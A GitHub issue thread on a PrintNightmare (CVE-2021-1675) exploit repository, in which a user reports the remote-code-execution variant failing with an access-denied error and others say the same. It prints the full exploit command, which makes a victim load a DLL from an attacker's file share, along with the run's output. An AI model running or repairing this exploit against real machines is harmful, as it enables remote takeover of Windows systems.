cube0x0/CVE-2021-1675

Access Denied on unpatched systems

bananabr opened this issue · 3 comments

bananabr commented

Hi,

I am trying to use the RCE version of the exploit on an unpatched test environment with no success. The LPE attack works.

Domain Controller:
image

Victim domain member:
image

This is the result:

python3 CVE-2021-1675.py 'LAB/attacker:Password@victim_IP' '\\file_server_IP\nightmare\nightmare.dll'
[*] Connecting to ncacn_np:192.168.0.200[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.0.102\nightmare\nightmare.dll
[*] Try 1...
Traceback (most recent call last):
  File "CVE-2021-1675.py", line 188, in <module>
    main(dce, pDriverPath, options.share)
  File "CVE-2021-1675.py", line 93, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.6/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.6.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.6/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.6.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rpcrt.DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

Any help is appriciated.

wxh0000mm commented

me too

isounikeko commented

same here

iz4tow commented

same